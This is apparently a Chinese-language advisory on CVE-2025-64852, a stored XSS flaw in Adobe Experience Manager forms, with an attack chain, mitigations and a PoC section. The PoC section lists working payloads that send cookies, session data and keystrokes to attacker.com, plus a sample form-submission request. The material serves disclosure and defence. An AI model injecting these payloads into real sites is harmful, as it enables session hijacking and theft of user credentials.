CVE-2025-64852 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64852

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64852是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响AEM 6.5.23及更早版本，攻击者可以利用低权限账户在表单字段中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含该表单字段的页面时，恶意代码会在其浏览器中自动执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于该漏洞需要低权限认证且需要用户交互，CVSS评分为5.4（中危），但在实际攻击场景中仍可能造成严重的安全风险，特别是针对管理后台用户时。Adobe已发布安全公告APSB25-115修复此漏洞。

技术细节

Adobe Experience Manager的表单处理组件未能对用户输入进行充分的HTML转义和验证。攻击者通过以下步骤利用此漏洞：1) 使用低权限账户登录AEM；2) 在存在漏洞的表单字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>；3) 提交表单后，恶意脚本被存储在服务器数据库或内容仓库中；4) 当其他用户访问包含该字段的页面时，受害者浏览器会解析并执行注入的脚本。由于AEM使用Sling框架和HTL模板引擎，但某些自定义组件或第三方插件可能绕过了安全编码机制。攻击者可通过XMLHttpRequest或fetch API窃取会话令牌，或通过DOM操作修改页面内容。防御措施包括升级到AEM 6.5.24或更高版本、对所有用户输入使用OWASP Java Encoder库进行编码、启用Content Security Policy(CSP)头部等。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标AEM实例版本，确认版本≤6.5.23且存在可利用的表单字段

STEP 2

步骤2：账户获取

攻击者获取AEM低权限账户（如普通用户或内容编辑角色），可通过社工、弱密码或内部访问获取

STEP 3

步骤3：漏洞利用

在表单输入字段中注入恶意JavaScript代码，如<script>fetch('https://attacker.com/c?c='+document.cookie)</script>

STEP 4

步骤4：持久化

提交表单后，恶意脚本被存储在AEM JCR内容仓库中，实现持久化

STEP 5

步骤5：触发执行

当管理员或其他用户访问包含该表单字段的页面时，浏览器自动解析并执行注入的恶意脚本

STEP 6

步骤6：数据窃取/会话劫持

恶意脚本窃取用户Cookie、会话令牌或执行其他恶意操作，攻击者接收窃取的数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-64852 -->
<!-- This PoC demonstrates injecting malicious JavaScript via vulnerable form field -->

<!-- Step 1: Inject payload into vulnerable form field -->
<!-- Target: Any form field in Adobe Experience Manager 6.5.23 or earlier -->

<!-- Basic XSS Payload -->
<script>alert('XSS')</script>

<!-- Cookie Stealing Payload -->
<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

<!-- Session Hijacking Payload -->
<script>
  var img = new Image();
  img.src = 'https://attacker.com/log?data=' + encodeURIComponent(document.cookie + '|URL:' + window.location.href);
</script>

<!-- DOM-based Keylogger -->
<script>
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/keylog?k=' + e.key);
  });
</script>

<!-- Example HTTP Request to submit form with XSS payload -->
<!-- POST /content/forms/af/vulnerable-form/jcr:content/guideContainer.af.submit.jsp HTTP/1.1 -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- -->
<!-- fieldName=<script>alert(document.domain)</script>&submit=Submit -->

<!-- To exploit: -->
<!-- 1. Authenticate with low-privilege account -->
<!-- 2. Navigate to vulnerable form -->
<!-- 3. Inject payload in any text input field -->
<!-- 4. Submit form - payload is stored server-side -->
<!-- 5. When victim visits the page, payload executes automatically -->

影响范围

Adobe Experience Manager 6.5.23及更早版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制低权限用户创建或编辑表单的能力；2) 在WAF/CDN层面添加XSS防护规则，过滤<script>等危险标签；3) 启用SameSite Cookie属性防止会话劫持；4) 实施严格的CSP策略阻止内联脚本执行；5) 定期检查内容仓库中是否存在恶意脚本代码；6) 监控用户访问日志，对异常的外部请求进行告警。